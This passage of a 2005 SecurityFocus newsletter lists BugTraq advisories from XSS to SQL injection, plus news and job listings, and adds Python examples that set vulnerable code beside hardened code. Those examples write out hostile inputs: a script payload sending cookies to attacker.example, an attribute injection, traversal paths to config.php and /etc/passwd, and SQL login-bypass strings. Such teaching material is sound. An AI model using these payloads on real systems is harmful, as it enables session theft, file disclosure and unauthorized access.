44. McDATA E/OS Remote Denial Of Service Vulnerability
BugTraq ID: 14475
Remote: Yes
Date Published: 2005-08-04
Relevant URL: http://www.securityfocus.com/bid/14475
Summary:
McDATA Sphereon 4300 and 4500 Fabric Switches and Intrepid 6064 and 6140
Director Switches are susceptible to a remote denial of service vulnerability.
This issue is due to the affected devices failing to properly handle network
broadcast storms.

Hosts that use the SAN for storage may lose all access to the attached storage.

This vulnerability allows attackers to simultaneously deny storage service to
potentially numerous servers connected to a SAN.

Versions of E/OS prior to 6.0.0 are affected by this vulnerability.

45. Microsoft August Advance Notification Unspecified Security Vulnerabilities
BugTraq ID: 14476
Remote: Unknown
Date Published: 2005-08-04
Relevant URL: http://www.securityfocus.com/bid/14476
Summary:
Microsoft has released advance notification that it will release six security
bulletins on August 9, 2005.

All six security bulletins address Microsoft Windows.

46. Linux Kernel XFRM Array Index Buffer Overflow Vulnerability
BugTraq ID: 14477
Remote: No
Date Published: 2005-08-05
Relevant URL: http://www.securityfocus.com/bid/14477
Summary:
Linux kernel is prone to an array index buffer overflow vulnerability.  This
issue exists due to insufficient validation of user-supplied data.  The
vulnerability exists in the XFRM network architecture code.  

A successful attack can allow a local attacker to trigger an overflow, which may
lead to a denial of service condition due to memory corruption.  Arbitrary code
execution may be possible, however, this has not been confirmed.

This issue affects Linux Kernel versions 2.6.x.

47. Comdev ECommerce Config.PHP Remote File Include Vulnerability
BugTraq ID: 14478
Remote: Yes
Date Published: 2005-08-05
Relevant URL: http://www.securityfocus.com/bid/14478
Summary:
Comdev eCommerce is prone to a remote file include vulnerability.  This issue is
due to a failure in the application to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary server-side script code
on an affected computer with the privileges of the Web server process. This may
facilitate unauthorized access.

This issue reportedly affects Comdev eCommerce version 3.0; other versions may
also be vulnerable.

48. Comdev eCommerce WCE.Download.PHP Directory Traversal Vulnerability
BugTraq ID: 14479
Remote: Yes
Date Published: 2005-08-05
Relevant URL: http://www.securityfocus.com/bid/14479
Summary:
Comdev eCommerce is prone to a directory traversal vulnerability. 

A remote unauthorized user can disclose the contents of arbitrary local files
through the use of directory traversal strings '../' relative to the Web
application's root path. Exploitation of this vulnerability could lead to a loss
of confidentiality.



49. Microsoft Windows Unspecified Remote Arbitrary Code Execution Vulnerability
BugTraq ID: 14480
Remote: Yes
Date Published: 2005-08-01
Relevant URL: http://www.securityfocus.com/bid/14480
Summary:
Microsoft Windows is affected by an unspecified remote arbitrary code execution
vulnerability.

Reportedly, this issue can allow remote unauthenticated attackers to gain access
to an affected computer without any user interaction.

Reports indicate that this issue may lend itself to the development of
self-propagating malicious code due to the lack of user interaction required for
exploitation.  It is conjectured that a SYSTEM level compromise is possible.

Due to a lack of details, further information is not available at the moment. 
This BID will be updated when more information becomes available.

50. Jax PHP Scripts Multiple Cross-Site Scripting Vulnerabilities
BugTraq ID: 14481
Remote: Yes
Date Published: 2005-08-05
Relevant URL: http://www.securityfocus.com/bid/14481
Summary:
Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. 
These issues are due to a failure in the applications to properly sanitize
user-supplied input.

An attacker may leverage any of these issues to have arbitrary script code
executed in the browser of an unsuspecting user in the context of the affected
site.  This may facilitate the theft of cookie-based authentication credentials
as well as other attacks.

51. Jax PHP Scripts Multiple Remote Information Disclosure Vulnerabilities
BugTraq ID: 14482
Remote: Yes
Date Published: 2005-08-05
Relevant URL: http://www.securityfocus.com/bid/14482
Summary:
Jax PHP Scripts are prone to multiple remote information disclosure
vulnerabilities.

These issues are due to a failure in the application to perform proper access
validation before granting access to sensitive and privileged information.

An attacker can exploit these vulnerabilities to obtain the IP addresses of
banned users, or of users who have contributed to the Web site: users who have
signed petitions, sent messages through the formmail, posted messages, or
suggested a link.

52. FlatNuke Multiple Cross Site Scripting Vulnerabilities
BugTraq ID: 14483
Remote: Yes
Date Published: 2005-08-05
Relevant URL: http://www.securityfocus.com/bid/14483
Summary:
FlatNuke is prone to multiple cross-site scripting vulnerabilities. These issues
are due to a failure in the application to properly sanitize user-supplied
input.

An attacker can exploit these vulnerabilities to inject HTML and script code
into the Web browser of an unsuspecting victim. The attacker may then steal
cookie-based authentication credentials. Other attacks are also possible.


53. PHPOpenChat Multiple HTML Injection Vulnerabilities
BugTraq ID: 14484
Remote: Yes
Date Published: 2005-08-05
Relevant URL: http://www.securityfocus.com/bid/14484
Summary:
PHPOpenChat is prone to multiple HTML injection vulnerabilities.  These issues
are due to a failure in the application to properly sanitize user-supplied input
before using it in dynamically generated content.

Attacker-supplied HTML and script code would be executed in the context of the
affected Web site, potentially allowing for theft of cookie-based authentication
credentials. An attacker could also exploit this issue to control how the site
is rendered to the user; other attacks are also possible.
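The cross-site scripting and HTML injection entries above (BIDs 14464, 14468, 14472, 14473, 14481, 14483 and 14484) all come down to the same pattern: user-supplied text concatenated into the page. The following Python example is added here to show that pattern beside its hardened form; it is not code from any of the products named, and the payloads, the page template and the `active_content` helper are constructed for the illustration. The parser-based check is what makes the difference visible: it reports which tags and event-handler attributes a browser would actually act on in each rendering, which is more telling than eyeballing the string. Note that `html.escape(..., quote=True)` is the right call for the two contexts shown (text node, double-quoted attribute); other contexts such as JavaScript or URL attributes need their own encoding.

```python
import html
from html.parser import HTMLParser

# Constructed sample payloads of the kind the advisories describe: one aimed at
# a text-node context (exfiltrates document.cookie), one at a quoted attribute.
# They are illustrations for this example, not taken from any report.
PAYLOAD = ('<script>new Image().src="http://attacker.example/?c="'
           '+document.cookie</script>')
ATTR_PAYLOAD = '" onmouseover="alert(document.cookie)'


def render_vulnerable(name, colour):
    """The unsafe pattern behind the entries above: untrusted values are
    spliced straight into markup, in both a text-node and an attribute."""
    return '<div class="' + colour + '">Welcome, ' + name + '</div>'


def render_escaped(name, colour):
    """Hardened form for these two contexts: quote=True escapes & < > " and '
    so a value can neither open a tag nor close the attribute it sits in."""
    return ('<div class="' + html.escape(colour, quote=True) + '">Welcome, '
            + html.escape(name, quote=True) + '</div>')


class _TagCollector(HTMLParser):
    """Records every start tag and its attribute names (hypothetical helper)."""

    def __init__(self):
        super().__init__()
        self.tags = []  # list of (tag, [attribute names])

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, [a for a, _ in attrs]))


def active_content(fragment):
    """Return (tag names, on* attribute names) a browser would act on in the
    fragment. Used to show what each renderer really emits."""
    collector = _TagCollector()
    collector.feed(fragment)
    collector.close()
    tags = [tag for tag, _ in collector.tags]
    handlers = [a for _, attrs in collector.tags
                for a in attrs if a.lower().startswith('on')]
    return tags, handlers


if __name__ == '__main__':
    for renderer in (render_vulnerable, render_escaped):
        print(renderer.__name__)
        print('  text context     ->', active_content(renderer(PAYLOAD, 'blue')))
        print('  attribute context->', active_content(renderer('Bob', ATTR_PAYLOAD)))
```

Running the script shows the vulnerable renderer emitting a `script` tag in the first case and an `onmouseover` handler in the second, while the escaped renderer produces a single `div` with no handlers for both payloads.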

54. FlatNuke User Data Arbitrary PHP Code Execution Vulnerability
BugTraq ID: 14485
Remote: Yes
Date Published: 2005-08-05
Relevant URL: http://www.securityfocus.com/bid/14485
Summary:
FlatNuke is affected by an arbitrary PHP code execution vulnerability.  This
issue is due to a failure in the application to properly sanitize user-supplied
input recorded during user registration.

An attacker can exploit this vulnerability and supply arbitrary PHP code as part
of the user data.  The attacker can then call the stored file and have the
uncommented code executed in the context of the Web server process.  This may
aid the attacker in further attacks against the underlying system. 

55. Lantronix Secure Console Server SCS820/SCS1620 Multiple Local
Vulnerabilities
BugTraq ID: 14486
Remote: No
Date Published: 2005-08-05
Relevant URL: http://www.securityfocus.com/bid/14486
Summary:
Lantronix Secure Console Server SCS820/SCS1620 devices are susceptible to
multiple local vulnerabilities.

The first issue is an insecure default permission vulnerability. Attackers may
exploit this vulnerability to write data to arbitrary files with superuser
privileges. Other attacks are also possible.

The second issue is a directory traversal vulnerability in the command-line
interface. Attackers may exploit this vulnerability to gain inappropriate access
to the underlying operating system.

The third issue is a privilege escalation vulnerability in the command-line
interface. Local users with 'sysadmin' access to the device can escape the
command-line interface to gain superuser privileges in the underlying operating
system.

The last issue is a buffer overflow vulnerability in the 'edituser' binary.
Attackers may exploit this vulnerability to execute arbitrary machine code with
superuser privileges.

The reporter of these issues states that firmware versions prior to 4.4 are
vulnerable.

56. EMC Navisphere Manager Directory Traversal And Information Disclosure
Vulnerabilities
BugTraq ID: 14487
Remote: Yes
Date Published: 2005-08-05
Relevant URL: http://www.securityfocus.com/bid/14487
Summary:
EMC Navisphere Manager is affected by directory traversal and information
disclosure vulnerabilities.  These issues are due to a failure in the
application to properly sanitize user-supplied input.

A remote unauthorized user can disclose the contents of arbitrary local files
through the use of directory traversal strings '../'.  An attacker can also
obtain the contents of arbitrary directories by appending a '.' to the end of a
request. Exploitation of these vulnerabilities results in a loss of
confidentiality.
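The two directory traversal entries above (Comdev eCommerce wce.download.php, BID 14479, and EMC Navisphere Manager, BID 14487) describe the same defect: a user-supplied path is joined onto the application's root and opened without checking where it ends up, and in the Navisphere case a trailing '.' turns a file request into a directory listing. The following Python example is added here (it is not code from either product) to show a file-serving check that rejects both cases. It canonicalises the requested path, compares it against the canonical root with `os.path.commonpath` rather than a string prefix, and refuses anything that is not a regular file. The directory layout it builds under a temporary directory, including the `config.php` above the web root and the `htdocs_private` sibling, is constructed for the demonstration.

```python
import os
import tempfile


class TraversalRejected(ValueError):
    """Raised for any request that must not be served."""


def safe_open_path(web_root, user_path):
    """Map a user-supplied relative path onto web_root.

    Rejects absolute paths, NUL bytes, anything whose canonical form lies
    outside the canonical root, and anything that is not a regular file (so a
    trailing '.' or a bare directory name cannot yield a listing).
    """
    root = os.path.realpath(web_root)
    if not user_path or '\x00' in user_path or os.path.isabs(user_path):
        raise TraversalRejected(user_path)
    candidate = os.path.realpath(os.path.join(root, user_path))
    # commonpath works on path components; a startswith() check would accept
    # '<root>_private/...' because it shares the root's characters as a prefix.
    if os.path.commonpath([root, candidate]) != root:
        raise TraversalRejected(user_path)
    if not os.path.isfile(candidate):
        raise TraversalRejected(user_path)
    return candidate


# Requests exercised by the demonstration (constructed): one legitimate
# download, classic '../' escapes, a sibling-directory prefix trick, the
# directory-listing cases, and an absolute path.
REQUESTS = [
    'downloads/catalog.pdf',
    '../config.php',
    'downloads/../../config.php',
    '../htdocs_private/notes.txt',
    'downloads/.',
    'downloads',
    '/etc/passwd',
]


def build_demo_root():
    """Create a constructed layout: <base>/htdocs is the web root, with a
    'secret' config.php one level above it and a sibling directory whose
    name starts with the root's name."""
    base = tempfile.mkdtemp()
    root = os.path.join(base, 'htdocs')
    os.makedirs(os.path.join(root, 'downloads'))
    os.makedirs(os.path.join(base, 'htdocs_private'))
    with open(os.path.join(root, 'downloads', 'catalog.pdf'), 'w') as f:
        f.write('catalog contents')
    with open(os.path.join(base, 'config.php'), 'w') as f:
        f.write('<?php $db_password = "example"; ?>')
    with open(os.path.join(base, 'htdocs_private', 'notes.txt'), 'w') as f:
        f.write('not for the web')
    return root


def check_requests(root):
    """Return {request: 'allowed' | 'rejected'} for every entry in REQUESTS."""
    results = {}
    for req in REQUESTS:
        try:
            safe_open_path(root, req)
            results[req] = 'allowed'
        except TraversalRejected:
            results[req] = 'rejected'
    return results


if __name__ == '__main__':
    for req, verdict in check_requests(build_demo_root()).items():
        print('%-32s %s' % (req, verdict))
```

Only the first request is served; every other entry in `REQUESTS` is rejected, including the two that resolve to existing files outside the root and the two that resolve to directories.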


57. Acunetix Web Vulnerability Scanner Remote Denial of Service Vulnerability
BugTraq ID: 14488
Remote: Yes
Date Published: 2005-08-06
Relevant URL: http://www.securityfocus.com/bid/14488
Summary:
Acunetix Web Vulnerability Scanner is affected by a remote denial of service
vulnerability.  This issue affects the Web sniffer component of the application.

An attacker can exploit this issue by gaining control of a server through some
means or by sending spoofed traffic to the network.  A successful attack can
result in a denial of service condition due to resource exhaustion.

Acunetix Web Vulnerability Scanner version 2.0 is affected.  Other versions may
be vulnerable as well.

58. PHP-Fusion Messages.PHP SQL Injection Vulnerability
BugTraq ID: 14489
Remote: Yes
Date Published: 2005-08-06
Relevant URL: http://www.securityfocus.com/bid/14489
Summary:
PHP-Fusion is prone to an SQL injection vulnerability.

This issue is due to a failure in the application to properly sanitize
user-supplied input to the 'messages.php' script before using it in an SQL
query.

Successful exploitation could result in a compromise of the application,
disclosure or modification of data, or may permit an attacker to exploit
vulnerabilities in the underlying database implementation.
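The SQL injection entries above (Silvernews admin.php, BID 14466; Naxtor E-directory default.asp, BID 14469; PortailPHP index.php, BID 14474; PHP-Fusion messages.php, BID 14489) share one root cause, and two of them explicitly concern bypassing an admin login. The following Python example is added here to show that login check in its vulnerable form beside the parameterized form; it is not code from any of the products named. The user table, the credentials in it and the two payloads are constructed for the demonstration, and passwords are kept in clear text only to keep the query readable (a real application compares against a salted hash). The point it demonstrates is that with a fixed statement and bound parameters the same payloads are matched literally as a user name or password and never reach the SQL parser.

```python
import sqlite3


def make_demo_db():
    """Constructed sample data: an admin account and one ordinary user."""
    conn = sqlite3.connect(':memory:')
    conn.execute('CREATE TABLE users (name TEXT, password TEXT, is_admin INTEGER)')
    conn.executemany('INSERT INTO users VALUES (?, ?, ?)',
                     [('admin', 'correct horse battery', 1),
                      ('bob', 'hunter2', 0)])
    return conn


def login_vulnerable(conn, name, password):
    """The pattern behind the entries above: request fields are spliced into
    the query text, so quotes and comment markers in them change the SQL."""
    sql = ("SELECT name, is_admin FROM users "
           "WHERE name = '%s' AND password = '%s'" % (name, password))
    return conn.execute(sql).fetchone()


def login_parameterized(conn, name, password):
    """Hardened form: the statement is fixed at development time and the
    request fields travel only as bound values."""
    sql = "SELECT name, is_admin FROM users WHERE name = ? AND password = ?"
    return conn.execute(sql, (name, password)).fetchone()


# Two classic login-bypass payloads (constructed for the example):
#  - a comment marker that truncates the password clause
#  - a tautology appended to the password clause
COMMENT_BYPASS = ("admin' --", "anything")
TAUTOLOGY_BYPASS = ("x", "' OR '1'='1")


if __name__ == '__main__':
    db = make_demo_db()
    for label, (user, pw) in (('comment', COMMENT_BYPASS),
                              ('tautology', TAUTOLOGY_BYPASS)):
        print('%-10s vulnerable=%r parameterized=%r' % (
            label, login_vulnerable(db, user, pw),
            login_parameterized(db, user, pw)))
```

Against the vulnerable function the comment payload returns the admin row and the tautology payload returns a row without knowing any password; against the parameterized function both return no row, while genuine credentials still log in.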

III. SECURITYFOCUS NEWS ARTICLES
--------------------------------
1. Microsoft's "monkeys" find first zero-day exploit
By: Robert Lemos
The software giant continues its honeymonkey research, finding more than 750
exploits for Windows computers, including an attack using a vulnerability that
had not been publicly disclosed.
http://www.securityfocus.com/news/11273

2. Annual hacking game teaches security lessons
By: Robert Lemos
At the DEF CON conference, the latest version of the weekend-long Capture the
Flag game stresses code auditing as a measure of hacking skills, but also
requires participants to think about balancing attack and defense as well as
physical security.
http://www.securityfocus.com/news/11269

3. Exploit writers team up to target Cisco routers
By: Robert Lemos
Security researchers and hackers, angered by Cisco attempts to quash a recent
flaw finder's presentation, aim to reproduce and extend attacks on the
networking giant's Internet products.
http://www.securityfocus.com/news/11263

4. Reading, rooting, 'rithmetic: Preschoolers learn programming
By: Robert Lemos
One educator argues that kids should be taught computer programming and hacking
skills from preschool to reinforce creativity and technology learning.
http://www.securityfocus.com/news/11262

5. ID theft automated using keylogger Trojan
By: John Leyden
Anti-spyware researchers have uncovered a massive identity theft ring linked to
keylogging software.
http://www.securityfocus.com/news/11274

6. Former 'Spam King' pays MS $7m to settle lawsuit
By: John Leyden
Former 'Spam King' Scott Richter has agreed to pay Microsoft $7m to settle an
anti-spam lawsuit.
http://www.securityfocus.com/news/11275

7. Microsoft quells Vista virus concerns
By: John Leyden
Microsoft has confirmed that a new scripting tool will not ship as part of the
next version of its operating system, Windows Vista.
http://www.securityfocus.com/news/11271

8. OS exploits are 'old hat'
By: John Leyden
Security issues involving Cisco kit highlighted in Michael Lynn’s
presentation at Black Hat are characteristic of networking vendors in general.
http://www.securityfocus.com/news/11272

IV.  SECURITY JOBS LIST SUMMARY
-------------------------------
1. [SJ-JOB] Account Manager, Reston, VA
http://www.securityfocus.com/archive/77/407636

2. [SJ-JOB] Director, Information Security, Portland
http://www.securityfocus.com/archive/77/407637

3. [SJ-JOB] Application Security Architect, Amsterdam
http://www.securityfocus.com/archive/77/407634

4. [SJ-JOB] Sr. Security Analyst, Fredericton
http://www.securityfocus.com/archive/77/407638

5. [SJ-JOB] Forensics Engineer, London
http://www.securityfocus.com/archive/77/407635

6. [SJ-JOB] Security Consultant, Bern, Lausanne or Zurich
http://www.securityfocus.com/archive/77/407621

7. [SJ-JOB] Security Consultant, Munich or Frankfurt
http://www.securityfocus.com/archive/77/407619

8. [SJ-JOB] Compliance Officer, M4 Corridor
http://www.securityfocus.com/archive/77/407620

9. [SJ-JOB] Security Consultant, Grapevine
http://www.securityfocus.com/archive/77/407618

10. [SJ-JOB] Security Engineer, Milpitas
http://www.securityfocus.com/archive/77/407614

11. [SJ-JOB] Application Security Architect, Bern, Lausanne or Zurich
http://www.securityfocus.com/archive/77/407616

12. [SJ-JOB] Security Consultant, Bristol
http://www.securityfocus.com/archive/77/407612

13. [SJ-JOB] Developer, Boulder
http://www.securityfocus.com/archive/77/407613

14. [SJ-JOB] Developer, Boulder
http://www.securityfocus.com/archive/77/407615

15. [SJ-JOB] Security System Administrator, Albany
http://www.securityfocus.com/archive/77/407611

16. [SJ-JOB] Security System Administrator, Albany
http://www.securityfocus.com/archive/77/407609

17. [SJ-JOB] Account Manager, Seattle
http://www.securityfocus.com/archive/77/407610

18. [SJ-JOB] Manager, Information Security, Boston
http://www.securityfocus.com/archive/77/407607

19. [SJ-JOB] Security Consultant, Maidenhead, Berkshire
http://www.securityfocus.com/archive/77/407608

20. [SJ-JOB] Sr. Security Analyst, Buffalo
http://www.securityfocus.com/archive/77/407598

21. [SJ-JOB] Chief Security Strategist, Los Angeles
http://www.securityfocus.com/archive/77/407596

22. [SJ-JOB] Manager, Information Security, Oklahoma City
http://www.securityfocus.com/archive/77/407595

23. [SJ-JOB] Technology Risk Consultant, Chicago
http://www.securityfocus.com/archive/77/407594

24. [SJ-JOB] Sr. Security Analyst, Sterling
http://www.securityfocus.com/archive/77/407591

25. [SJ-JOB] Manager, Information Security, Buffalo
http://www.securityfocus.com/archive/77/407605

26. [SJ-JOB] Forensics Engineer, Countrywide
http://www.securityfocus.com/archive/77/407454

27. [SJ-JOB] Security Consultant, New York
http://www.securityfocus.com/archive/77/407456

28. [SJ-JOB] Manager, Information Security, Boston
http://www.securityfocus.com/archive/77/407453

29. [SJ-JOB] Security Engineer, Boston
http://www.securityfocus.com/archive/77/407452

30. [SJ-JOB] Security Engineer, Los Angeles
http://www.securityfocus.com/archive/77/407455

31. [SJ-JOB] Security Consultant, Pennsylvania
http://www.securityfocus.com/archive/77/407441

32. [SJ-JOB] Security Consultant, New Jersey
http://www.securityfocus.com/archive/77/407440

33. [SJ-JOB] Security Consultant, California
http://www.securityfocus.com/archive/77/407437

34. [SJ-JOB] Sales Representative, Atlanta
http://www.securityfocus.com/archive/77/407438

35. [SJ-JOB] Security Consultant, Connecticut
http://www.securityfocus.com/archive/77/407439

36. [SJ-JOB] Sales Engineer, New York
http://www.securityfocus.com/archive/77/407374

37. [SJ-JOB] Sales Engineer, El Segundo
http://www.securityfocus.com/archive/77/407375

38. [SJ-JOB] Compliance Officer, Warren
http://www.securityfocus.com/archive/77/407372

39. [SJ-JOB] Security Engineer, Edison
http://www.securityfocus.com/archive/77/407369

40. [SJ-JOB] Evangelist, Dallas
http://www.securityfocus.com/archive/77/407371

41. [SJ-JOB] Security Engineer, Chantilly
http://www.securityfocus.com/archive/77/407373

42. [SJ-JOB] Security Architect, Santa Ana
http://www.securityfocus.com/archive/77/407370

43. [SJ-JOB] Account Manager, California
http://www.securityfocus.com/archive/77/407337

44. [SJ-JOB] Security System Administrator, Atlanta
http://www.securityfocus.com/archive/77/407334

45. [SJ-JOB] Sales Representative, Dallas
http://www.securityfocus.com/archive/77/407336

46. [SJ-JOB] Sales Representative, Atlanta
http://www.securityfocus.com/archive/77/407335

47. [SJ-JOB] Technical Support Engineer, Atlanta
http://www.securityfocus.com/archive/77/407359

48. [SJ-JOB] Sales Representative, Atlanta
http://www.securityfocus.com/archive/77/407304

49. [SJ-JOB] Sales Representative, Atlanta
http://www.securityfocus.com/archive/77/407302

50. [SJ-JOB] Developer, Atlanta
http://www.securityfocus.com/archive/77/407303

51. [SJ-JOB] Sales Representative, Atlanta
http://www.securityfocus.com/archive/77/407301

52. [SJ-JOB] Security System Administrator, Springfield
http://www.securityfocus.com/archive/77/407305

53. [SJ-JOB] Application Security Engineer, New York City
http://www.securityfocus.com/archive/77/407296

54. [SJ-JOB] Security Researcher, El Segundo
http://www.securityfocus.com/archive/77/407292

55. [SJ-JOB] Jr. Security Analyst, Redwood City
http://www.securityfocus.com/archive/77/407291

56. [SJ-JOB] Management, Chantilly
http://www.securityfocus.com/archive/77/407294

57. [SJ-JOB] Sr. Security Analyst, Atlanta (downtown)
http://www.securityfocus.com/archive/77/407293

58. [SJ-JOB] Security Engineer, Sunnyvale
http://www.securityfocus.com/archive/77/407183

59. [SJ-JOB] Sales Engineer, Dallas
http://www.securityfocus.com/archive/77/407176

60. [SJ-JOB] Sales Engineer, Washington Metro Area
http://www.securityfocus.com/archive/77/407175

61. [SJ-JOB] Compliance Officer, Miami
http://www.securityfocus.com/archive/77/407173

62. [SJ-JOB] Security System Administrator, Western Kansas
http://www.securityfocus.com/archive/77/407174

63. [SJ-JOB] Security Consultant, New York
http://www.securityfocus.com/archive/77/407179

64. [SJ-JOB] Sales Engineer, Singapore
http://www.securityfocus.com/archive/77/407178

65. [SJ-JOB] Security Consultant, Cambridge
http://www.securityfocus.com/archive/77/407180

66. [SJ-JOB] Security Architect, Portland
http://www.securityfocus.com/archive/77/407181

67. [SJ-JOB] Sr. Security Engineer, Islandia
http://www.securityfocus.com/archive/77/407177

68. [SJ-JOB] Sr. Security Engineer, Bethesda
http://www.securityfocus.com/archive/77/407169

69. [SJ-JOB] Sr. Security Engineer, Austin
http://www.securityfocus.com/archive/77/407167

70. [SJ-JOB] Security Researcher, Austin
http://www.securityfocus.com/archive/77/407168

71. [SJ-JOB] VP / Dir / Mgr engineering, Washington
http://www.securityfocus.com/archive/77/407165

72. [SJ-JOB] Security Consultant, Boisbriand
http://www.securityfocus.com/archive/77/407166

73. [SJ-JOB] Sr. Security Analyst, central
http://www.securityfocus.com/archive/77/405941

74. [SJ-JOB] VP / Dir / Mgr engineering, Pune
http://www.securityfocus.com/archive/77/405939

75. [SJ-JOB] Quality Assurance, Cupertino
http://www.securityfocus.com/archive/77/405943

76. [SJ-JOB] Technical Marketing Engineer, Cupertino
http://www.securityfocus.com/archive/77/405946

77. [SJ-JOB] Security System Administrator, Appleton
http://www.securityfocus.com/archive/77/405947

V.   INCIDENTS LIST SUMMARY
---------------------------
VI.  VULN-DEV RESEARCH LIST SUMMARY
-----------------------------------
VII. MICROSOFT FOCUS LIST SUMMARY
---------------------------------
1. IEEE 802.1x & EAP-TLS design based on Windows 2000 Server
http://www.securityfocus.com/archive/88/407639

2. SecurityFocus Microsoft Newsletter #250
http://www.securityfocus.com/archive/88/407139

VIII. SUN FOCUS LIST SUMMARY
----------------------------
1. Securing Solaris 10
http://www.securityfocus.com/archive/92/407347

2. Accessing Solaris 10 Local Zones from the Global Zone, security risk
http://www.securityfocus.com/archive/92/406952

IX. LINUX FOCUS LIST SUMMARY
----------------------------

X.  BOOK EXCERPTS
----------------------------
1. Hacking the Code: ASP.NET Web Application Security (Syngress)
Chapter 4: Encrypting Private Data
http://www.securityfocus.com/excerpts/13

2. Exclusive Preview of Stealing the Network: How to Own an Identity
(Syngress)
Chapter 7: Death by a Thousand Cuts
http://www.securityfocus.com/excerpts/12